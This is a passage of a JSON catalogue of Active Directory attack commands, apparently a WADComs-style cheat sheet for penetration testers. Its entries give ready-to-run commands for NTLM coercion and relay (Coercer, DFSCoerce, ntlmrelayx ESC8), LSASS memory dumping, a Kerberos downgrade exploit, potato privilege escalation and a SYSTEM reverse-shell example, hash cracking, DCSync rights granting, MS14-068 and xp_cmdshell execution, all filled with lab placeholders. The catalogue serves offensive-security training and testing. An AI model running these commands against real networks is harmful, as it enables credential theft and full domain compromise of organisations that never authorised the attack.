10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["RPC","NTLM"],"references":["https://github.com/p0dalirius/Coercer","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/"],"added":true},{"id":"wadcoms:Coercer-Scan","toolId":"wadcoms:Coercer","toolName":"Coercer","name":"Coercer-Scan","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"Coercer scan -u john -p password123 -d test.local -t 10.10.10.1","description":"Coercer's 'scan' mode enumerates which RPC coercion methods and named pipes are reachable on a target without actually completing an authentication relay, letting an operator map the exposed attack surface (MS-RPRN, MS-EFSR, MS-DFSNM, MS-FSRVP, etc.) before choosing a vector. Use it as reconnaissance to confirm a host is vulnerable and to pick the quietest single method rather than blasting all of them with coerce. Typically run with a valid domain account.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["RPC","NTLM"],"references":["https://github.com/p0dalirius/Coercer","https://podalirius.net/en/articles/coercer-an-automatic-authentication-coercion-tool/"],"added":true},{"id":"wadcoms:Comsvcs-MiniDump-LSASS","toolId":"wadcoms:Comsvcs","toolName":"Comsvcs","name":"Comsvcs-MiniDump-LSASS","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# Get the LSASS PID first: tasklist /fi \"imagename eq lsass.exe\"\nrundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump <lsass_pid> C:\\Windows\\Temp\\lsass.dmp full","description":"The built-in comsvcs.dll exports a MiniDump function that rundll32 can call to write a full memory dump of any process by PID, making it a living-off-the-land LSASS dumper that needs no dropped tooling. Supply the LSASS PID (find it with tasklist or Get-Process lsass), an output path, and the 'full' flag for a complete dump. It requires SYSTEM (or admin + SeDebugPrivilege); the dump is then parsed offline with pypykatz or Mimikatz. This technique is well-signatured, so treat it as noisy.\n\nCommand Reference:\n\n\tOutput dump: C:\\Windows\\Temp\\lsass.dmp\n\n\tLSASS PID: <lsass_pid>","mitre":["T1003.001"],"requires":["Shell"],"services":["NTLM","Kerberos"],"references":["https://lolbas-project.github.io/lolbas/Libraries/comsvcs/","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"added":true},{"id":"wadcoms:CVE-2022-33679-Downgrade","toolId":"wadcoms:CVE","toolName":"CVE","name":"CVE-2022-33679 Kerberos RC4-MD4 Downgrade","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Execution"],"nativeCategory":["Credential Access","Exploitation"],"command":"# target = domain/username (AS-REP-roastable account), serverName = DC FQDN\npython3 CVE-2022-33679.py test.local/john dc.test.local -dc-ip 10.10.10.1\n\n# Use the recovered ticket\nexport KRB5CCNAME=john_dc.ccache","description":"CVE-2022-33679 is an unauthenticated Kerberos encryption-downgrade attack: the KDC returns AS-REP material encrypted with the legacy RC4-MD4 (etype 24) cipher for an account, and a known-plaintext weakness lets the attacker brute-force the ephemeral session key and forge a usable TGT. Bdenneu's standalone exploit targets a domain account that has 'Do not require Kerberos pre-authentication' set and an RC4 key, needing only the victim's username (no password). It writes the recovered TGT to a ccache named <user>_<server>.ccache, which can then be used for unauthenticated Kerberoasting or further access.\n\nCommand Reference:\n\n\tTarget (domain/user): test.local/john\n\n\tDC host: dc.test.local\n\n\tDC IP: 10.10.10.1\n\n\tOutput: out.ccache","mitre":[],"requires":["No_Creds"],"services":["Kerberos"],"references":["https://github.com/Bdenneu/CVE-2022-33679","https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html","https://horizon3.ai/attack-research/attack-blogs/from-cve-2022-33679-to-unauthenticated-kerberoasting/"],"added":true},{"id":"wadcoms:DFSCoerce","toolId":"wadcoms:DFSCoerce","toolName":"DFSCoerce","name":"DFSCoerce","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 dfscoerce.py -u john -p password123 -d test.local 10.10.10.2 10.10.10.1","description":"DFSCoerce abuses the MS-DFSNM (Distributed File System Namespace Management) RPC interface exposed on a Domain Controller (via the \\PIPE\\netdfs named pipe) to coerce the DC machine account into authenticating to an attacker-controlled host. Because the vulnerable interface lives on the DC itself, it is a reliable path to relay the DC$ authentication to ADCS or LDAP for a domain takeover. The listener is passed first, the target DC second, mirroring PetitPotam's argument order. A valid low-privileged domain account is normally required.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["RPC","NTLM"],"references":["https://github.com/Wh04m1001/DFSCoerce","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-dfsnm"],"added":true},{"id":"wadcoms:DonPAPI-Collect","toolId":"wadcoms:DonPAPI","toolName":"DonPAPI","name":"DonPAPI-Collect","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"# Mass DPAPI harvest against a host (or CIDR / target file), fetching the domain backup key\ndonpapi collect -u john -p password123 -d test.local -t 10.10.10.1 --fetch-pvk\n\n# Browse the collected loot afterward\ndonpapi gui","description":"DonPAPI (login-securite) mass-harvests DPAPI-protected secrets across a set of Windows hosts from Linux without dropping a binary: it remotely reads and decrypts credential blobs, saved browser passwords and cookies, Wi-Fi keys, scheduled task and vault credentials, and certificates. The collect subcommand takes standard NetExec-style auth (-u/-p, -H for hashes, -k/--aesKey for Kerberos) and a -t target list; --fetch-pvk grabs the domain backup key so user masterkeys decrypt automatically. Results land in a local database browsable afterward with donpapi gui. Requires local admin on each target and is loud at scale, so scope the target list carefully.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/login-securite/DonPAPI","https://www.login-securite.com/2022/03/28/donpapi/"],"added":true},{"id":"wadcoms:EfsPotato-SeImpersonate","toolId":"wadcoms:EfsPotato","toolName":"EfsPotato","name":"EfsPotato-SeImpersonate","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Compile on the target with the bundled .NET compiler\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /nowarn:1691,618 /out:EfsPotato.exe EfsPotato.cs\n\n# Run a command as SYSTEM (optional 2nd arg picks the named pipe)\nEfsPotato.exe \"whoami\"\nEfsPotato.exe \"whoami\" 2","description":"EfsPotato abuses the MS-EFSRPC (Encrypting File System Remote) interface to coerce the local SYSTEM account to authenticate over a named pipe, then impersonates the token to run a command as SYSTEM. It is a single self-contained source file typically compiled on the target with csc.exe, which helps evade AV signatures on prebuilt potato binaries. The optional second argument selects the named pipe (1=lsarpc, 2=efsrpc, 3=samr, 4=lsass, 5=netlogon) to dodge partial MS-EFSRPC patches. Requires SeImpersonatePrivilege.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege\n\n\tPipe selector (optional): 2 = \\pipe\\efsrpc","mitre":[],"requires":["Shell"],"services":["RPC"],"references":["https://github.com/zcgonvh/EfsPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"added":true},{"id":"wadcoms:GodPotato-SeImpersonate","toolId":"wadcoms:GodPotato","toolName":"GodPotato","name":"GodPotato-SeImpersonate","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Run a command as NT AUTHORITY\\SYSTEM\nGodPotato-NET4.exe -cmd \"cmd /c whoami\"\n\n# Example: trigger a reverse shell payload as SYSTEM\nGodPotato-NET4.exe -cmd \"cmd /c C:\\Windows\\Temp\\rev.exe 10.10.10.2 443\"","description":"GodPotato abuses SeImpersonatePrivilege to escalate a service account to SYSTEM by triggering a SYSTEM RPC/DCOM authentication against a local fake OXID resolver, then impersonating the returned token. Unlike the older *Potato variants it works broadly across Windows Server 2012 R2 through 2022 and Windows 8 through 11. Pick the binary matching the installed .NET runtime (GodPotato-NET2/NET35/NET4). Requires SeImpersonatePrivilege or SeAssignPrimaryToken on the current token.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege","mitre":["T1134.002"],"requires":["Shell"],"services":["DCOM","RPC"],"references":["https://github.com/BeichenDream/GodPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato","https://attack.mitre.org/techniques/T1134/002/"],"added":true},{"id":"wadcoms:Hashcat-ASREPRoast","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-ASREPRoast","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# hashes.txt holds one $krb5asrep$23$user@TEST.LOCAL:... blob per account\nhashcat -m 18200 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\nhashcat -m 18200 hashes.txt --show","description":"Accounts with 'Do not require Kerberos preauthentication' set will return an AS-REP whose encrypted part is derived from the account password. Hashcat mode 18200 cracks the RC4-HMAC (etype 23) $krb5asrep$23$ format produced by Impacket GetNPUsers.py or Rubeus asreproast. No valid domain credentials are needed to collect these, and cracking is fully offline against a wordlist.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1558.004"],"requires":["Hash"],"services":["Kerberos"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://www.thehacker.recipes/ad/movement/kerberos/asreproast","https://attack.mitre.org/techniques/T1558/004/"],"added":true},{"id":"wadcoms:Hashcat-DCC2-mscash2","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-DCC2-mscash2","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# hashes.txt holds one $DCC2$10240#john#<hash> line per cached account\nhashcat -m 2100 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\nhashcat -m 2100 hashes.txt --show","description":"Domain Cached Credentials v2 (mscash2 / DCC2) are the cached logon verifiers stored on domain-joined hosts so users can log in when the DC is unreachable, recoverable with secretsdump.py or mimikatz. Hashcat mode 2100 cracks the $DCC2$iterations#username#hash format. DCC2 uses PBKDF2 (default 10240 iterations) and cannot be passed or relayed, so offline cracking is the only path to the password; expect it to be far slower than NTLM.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1003.005"],"requires":["Hash"],"services":["NTLM"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz","https://attack.mitre.org/techniques/T1003/005/"],"added":true},{"id":"wadcoms:Hashcat-Kerberoast-TGSREP","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-Kerberoast-TGSREP","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# hashes.txt holds one $krb5tgs$23$*...*$... blob per SPN\nhashcat -m 13100 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\n# recover already-cracked results from the potfile\nhashcat -m 13100 hashes.txt --show","description":"Kerberoasting returns a TGS-REP whose encrypted portion is derived from the service account's password. Hashcat mode 13100 targets the RC4-HMAC (etype 23) $krb5tgs$23$ format produced by Impacket GetUserSPNs.py or Rubeus. Because the ticket is keyed to the account password, it can be recovered fully offline with a wordlist, no further contact with the DC and no lockout risk. This is the standard follow-up to any Kerberoast collection.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1558.003"],"requires":["Hash"],"services":["Kerberos"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://www.thehacker.recipes/ad/movement/kerberos/kerberoast","https://attack.mitre.org/techniques/T1558/003/"],"added":true},{"id":"wadcoms:Hashcat-NetNTLMv1","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-NetNTLMv1","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# straight dictionary crack of the NetNTLMv1 response\nhashcat -m 5500 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\n# preferred: reverse a fixed-challenge (1122334455667788) response to the NT hash\n# format it with evilmog's ntlmv1-multi, then submit to crack.sh / crack DES locally\npython3 ntlmv1.py --ntlmv1 'john::TEST:...:...:1122334455667788'","description":"Legacy NetNTLMv1 responses (user::domain:LMresp:NTresp:challenge) are cracked with hashcat mode 5500. Their real value is that a NetNTLMv1 response captured against a known/forced challenge (e.g. 1122334455667788) is a DES computation over the raw NT hash, so it can be reversed to the account's NT hash rather than a password. The evilmog ntlmv1-multi tool formats the response for submission to crack.sh, which historically returned the NT hash instantly via DES rainbow tables (the public service has since been offline; the same reversal can be run locally as hashcat mode 14000 DES). The recovered NT hash then enables pass-the-hash.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":[],"requires":["Hash"],"services":["NTLM"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://github.com/evilmog/ntlmv1-multi","https://crack.sh/netntlm/"],"added":true},{"id":"wadcoms:Hashcat-NetNTLMv2","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-NetNTLMv2","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# hashes.txt holds one JOHN::TEST:112233...:HMAC:blob line per capture\nhashcat -m 5600 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt\n\nhashcat -m 5600 hashes.txt --show","description":"Responder, ntlmrelayx or an SMB/HTTP poisoning capture yields NetNTLMv2 challenge-response hashes in the form user::domain:challenge:HMAC:blob. Hashcat mode 5600 cracks these offline to recover the account's cleartext password. NetNTLMv2 cannot be passed-the-hash, so cracking (or relaying) is the only way to weaponise a captured response.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1110.002"],"requires":["Hash"],"services":["NTLM"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://www.thehacker.recipes/ad/movement/ntlm/capture","https://attack.mitre.org/techniques/T1110/002/"],"added":true},{"id":"wadcoms:Hashcat-NTLM-secretsdump","toolId":"wadcoms:Hashcat","toolName":"Hashcat","name":"Hashcat-NTLM-secretsdump","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# feed the full secretsdump pwdump line and let hashcat strip the user field\nhashcat -m 1000 -a 0 --username hashes.txt /usr/share/wordlists/rockyou.txt\n\n# or crack a bare NT hash\nhashcat -m 1000 -a 0 2a3de7fe356ee524cc9f3d579f2e0aa7 /usr/share/wordlists/rockyou.txt\n\nhashcat -m 1000 --username hashes.txt --show","description":"Impacket secretsdump.py, an NTDS.dit dump or a SAM dump yields lines of the form user:rid:lmhash:nthash:::. Hashcat mode 1000 cracks the raw NT hash to cleartext. The --username flag lets hashcat parse the full pwdump-style line and keep the account association in the output. Cracking is optional for lateral movement (NT hashes can be passed) but is needed to recover reusable passwords and to spot password reuse.\n\nCommand Reference:\n\n\tHash File: hashes.txt\n\n\tNT Hash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1003.002"],"requires":["Hash"],"services":["NTLM"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://github.com/fortra/impacket/blob/master/examples/secretsdump.py","https://attack.mitre.org/techniques/T1003/002/"],"added":true},{"id":"wadcoms:Impacket-dacledit-DCSync","toolId":"wadcoms:Impacket-dacledit","toolName":"Impacket-dacledit","name":"Impacket-dacledit-DCSync","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Persistence","Credential Access"],"nativeCategory":["PrivEsc","Persistence","Credential Access"],"command":"# Grant john DCSync rights on the domain object\ndacledit.py -action 'write' -rights 'DCSync' -principal 'john' -target-dn 'DC=test,DC=local' -dc-ip 10.10.10.1 'test.local/john:password123'","description":"Impacket's dacledit.py reads and modifies the DACL of an Active Directory object over LDAP. With `-action write -rights DCSync` against the domain naming context it grants a principal the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights, enabling that principal to perform a DCSync and dump every domain hash. This is a classic ACL-based domain-privilege-escalation and persistence primitive; it requires WriteDacl over the domain object. Back up the DACL with `-action read` first so you can restore it.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tGranted principal: john","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/dacl/grant-rights","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true},{"id":"wadcoms:Impacket-DescribeTicket","toolId":"wadcoms:Impacket-describeTicket","toolName":"Impacket-describeTicket","name":"Impacket-DescribeTicket","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"# Describe a ticket offline (envelope, flags, and the PAC where it can be read)\ndescribeTicket.py out.ccache","description":"Impacket describeTicket.py parses a Kerberos ticket file (ccache or kirbi) and prints its fields, and when given the relevant key it decrypts the enc-part and dumps the PAC, exposing the user, RID, group memberships and PAC signatures. It is the Linux counterpart to Rubeus describe and is useful for validating forged or captured tickets before use. Runs fully offline.\n\nCommand Reference:\n\n\tTicket file: out.ccache","mitre":[],"requires":["TGT"],"services":["Kerberos"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true},{"id":"wadcoms:Impacket-FindDelegation","toolId":"wadcoms:Impacket-findDelegation","toolName":"Impacket-findDelegation","name":"Impacket-FindDelegation","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Enumerate all delegation relationships in the domain\nfindDelegation.py test.local/john:password123 -dc-ip 10.10.10.1","description":"Impacket findDelegation.py enumerates every delegation relationship in the domain over LDAP: unconstrained, constrained (S4U2Proxy allowed-to-delegate-to targets) and resource-based constrained delegation. The output identifies accounts and computers that can be abused for privilege escalation and lateral movement via Kerberos delegation. Requires any valid domain credentials.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["Kerberos","LDAP"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/kerberos/delegations","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/constrained-delegation"],"added":true},{"id":"wadcoms:Impacket-GetUserSPNs-NoPreauth","toolId":"wadcoms:Impacket-GetUserSPNs","toolName":"Impacket-GetUserSPNs","name":"Impacket-GetUserSPNs-NoPreauth","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery","Credential Access"],"nativeCategory":["Enumeration","Credential Access"],"command":"# 'john' is an account with Kerberos pre-auth disabled; usernames.txt lists SPN accounts to roast\nGetUserSPNs.py -no-preauth john -usersfile usernames.txt -dc-host dc.test.local test.local/","description":"GetUserSPNs.py with -no-preauth performs Kerberoasting without any valid domain credentials. It leverages an account that has Kerberos pre-authentication disabled (an AS-REP roastable account): by altering the sname in a crafted KRB_AS_REQ, the KDC returns a service ticket instead of a TGT, encrypted with the target service account's key. Because you cannot query LDAP for SPNs without creds, you must supply candidate service-account names with -usersfile. The resulting TGS hashes are cracked offline. You only need the name of one pre-auth-disabled account plus a list of accounts to roast.\n\nCommand Reference:\n\n\tNo_Creds (name of an AS-REP roastable account: john)\n\tCandidate accounts file: usernames.txt\n\tDomain: test.local\n\tDomain Controller host: dc.test.local","mitre":[],"requires":["No_Creds"],"services":["Kerberos","LDAP"],"references":["https://github.com/fortra/impacket","https://swarm.ptsecurity.com/kerberoasting-without-spns/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast"],"added":true},{"id":"wadcoms:Impacket-GoldenPac","toolId":"wadcoms:Impacket-goldenPac","toolName":"Impacket-goldenPac","name":"Impacket-GoldenPac","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution","Lateral Movement"],"nativeCategory":["PrivEsc","Exploitation","Lateral Movement"],"command":"# Exploit MS14-068 to gain SYSTEM on an unpatched DC\ngoldenPac.py test.local/john:password123@dc.test.local","description":"Impacket goldenPac.py exploits MS14-068 (CVE-2014-6324): on an unpatched domain controller the PAC signature validation can be bypassed, letting an ordinary domain user forge a TGT claiming Domain Admin membership without the krbtgt key. The script builds the forged PAC, obtains a privileged ticket and then executes a command (PSEXEC-style) on the target DC. Only affects DCs missing the 2014 patch, but remains relevant against legacy lab and CTF environments.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain Controller host: dc.test.local","mitre":["T1558"],"requires":["Username","Password"],"services":["Kerberos","SMB"],"references":["https://github.com/fortra/impacket","https://github.com/fortra/impacket/blob/master/examples/goldenPac.py","https://attack.mitre.org/techniques/T1558/"],"added":true},{"id":"wadcoms:Impacket-MSSQLClient","toolId":"wadcoms:Impacket-mssqlclient","toolName":"Impacket-mssqlclient","name":"Impacket-MSSQLClient","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Lateral Movement","Discovery"],"nativeCategory":["Lateral Movement","Enumeration"],"command":"# SQL authentication (mixed-mode / sa account)\nmssqlclient.py test.local/john:password123@10.10.10.1\n\n# Windows (domain) authentication over NTLM\nmssqlclient.py test.local/john:password123@10.10.10.1 -windows-auth\n\n# Pass-the-hash with Windows auth\nmssqlclient.py -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 test.local/john@10.10.10.1 -windows-auth","description":"mssqlclient.py from Impacket opens an interactive TDS session against a Microsoft SQL Server. It supports plain SQL logins (the local sa or a mixed-mode account) as well as Windows/domain authentication via -windows-auth, which forces NTLM instead of SQL auth. Pass-the-hash works by supplying -hashes LMHASH:NTHASH instead of a password. Use it as the entry point for all further MSSQL abuse (enumeration, xp_cmdshell, linked servers).\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNT hash: 2a3de7fe356ee524cc9f3d579f2e0aa7","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server","https://www.thehacker.recipes/ad/movement/mssql"],"added":true},{"id":"wadcoms:Impacket-MSSQLClient-XPCmdShell","toolId":"wadcoms:Impacket-mssqlclient","toolName":"Impacket-mssqlclient","name":"Impacket-MSSQLClient-XPCmdShell","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"mssqlclient.py test.local/john:password123@10.10.10.1 -windows-auth\n\n# At the SQL> prompt:\nSQL> enable_xp_cmdshell\nSQL> xp_cmdshell whoami\nSQL> disable_xp_cmdshell","description":"Once connected with mssqlclient.py, the built-in enable_xp_cmdshell command flips the xp_cmdshell advanced option on (via sp_configure), and xp_cmdshell then runs arbitrary OS commands as the SQL Server service account. This requires sysadmin (or equivalent) on the instance. Disable it again with disable_xp_cmdshell to reduce footprint; enabling xp_cmdshell is noisy and commonly alerted on.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server","https://www.thehacker.recipes/ad/movement/mssql/execution"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-AddComputer","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-AddComputer","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"# Create a new computer account via the relayed session\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --add-computer 'ATTACKER$' 'password123'","description":"Impacket's ntlmrelayx.py relays authentication to LDAPS and, with --add-computer, creates a new attacker-controlled computer account in the directory. This abuses the default MachineAccountQuota of 10, which permits any authenticated domain user to add computer objects. The freshly created account (with a known password) becomes a foothold for follow-on RBCD or Shadow Credentials attacks. If a computername and password are omitted, ntlmrelayx generates a random machine name and password and prints them. LDAPS is required because adding a computer with a password sets attributes that the DC only permits over a signed/sealed channel.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tNew computer account: ATTACKER$\n\n\tPassword: password123","mitre":[],"requires":["No_Creds"],"services":["NTLM","LDAP"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-DumpLAPS-ADCS","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-DumpLAPS-ADCS","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery","Credential Access"],"nativeCategory":["Discovery","Credential Access","Enumeration"],"command":"# Dump LAPS passwords and enumerate AD CS via the relayed LDAP session\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --dump-laps --dump-adcs","description":"Impacket's ntlmrelayx.py can leverage a relayed LDAP session for reconnaissance instead of a direct attack. --dump-laps reads and prints any LAPS-managed local administrator passwords (ms-Mcs-AdmPwd) that the relayed identity is permitted to read, and --dump-adcs enumerates AD CS enrollment services and certificate templates to help identify ESC1-ESC8 misconfigurations. Both are low-noise post-relay actions useful for expanding access after coercing a user or computer to authenticate. The amount of data returned depends entirely on the relayed principal's read permissions.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local","mitre":[],"requires":["No_Creds"],"services":["NTLM","LDAP","ADCS"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://www.thehacker.recipes/ad/movement/ntlm/relay","https://www.thehacker.recipes/ad/movement/credentials/dumping/laps"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-ESC8-ADCS","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-ESC8-ADCS","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Privilege Escalation","Credential Access","Execution"],"nativeCategory":["PrivEsc","Credential Access","Exploitation"],"command":"# Relay coerced DC auth to AD CS web enrollment (ESC8)\npython3 ntlmrelayx.py -t http://ca.test.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController","description":"Impacket's ntlmrelayx.py relays coerced NTLM authentication to the Active Directory Certificate Services (AD CS) web enrollment endpoint (certsrv), abusing ESC8. HTTP enrollment interfaces do not enforce channel binding by default, so a relayed machine or user authentication can request a certificate on behalf of the coerced account. When a Domain Controller's machine account is coerced (via PetitPotam or the printer bug) and relayed against the DomainController template, the resulting certificate authenticates as the DC and enables full domain compromise. The --adcs flag enables the attack and --template selects the certificate template (Machine/DomainController for computers, User for users). ntlmrelayx prints the issued certificate as a base64 PFX for use with PKINIT.\n\nCommand Reference:\n\n\tAD CS enrollment endpoint: http://ca.test.local/certsrv/certfnsh.asp\n\n\tTemplate: DomainController","mitre":[],"requires":["No_Creds"],"services":["NTLM","ADCS"],"references":["https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/adcs/relay"],"added":true},{"id":"wadcoms:Impacket-NTLMRelayX-EscalateUser","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-EscalateUser","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Grant existing user 'john' DCSync rights via relayed privileged auth\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --escalate-user john","description":"Impacket's ntlmrelayx.py relays authentication from a privileged victim to LDAP/LDAPS and, with --escalate-user, grants the named existing user the ability to perform a DCSync by writing replication (Replicating Directory Changes) ACEs onto the domain object. This is used when you already control a low-privileged user account and can coerce a privileged principal (for example a Domain Admin session or a DC machine account) to authenticate to your relay. Unlike --add-computer, this modifies an existing account you already own rather than creating a new one, which is useful in environments where MachineAccountQuota is 0.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tUser to escalate: 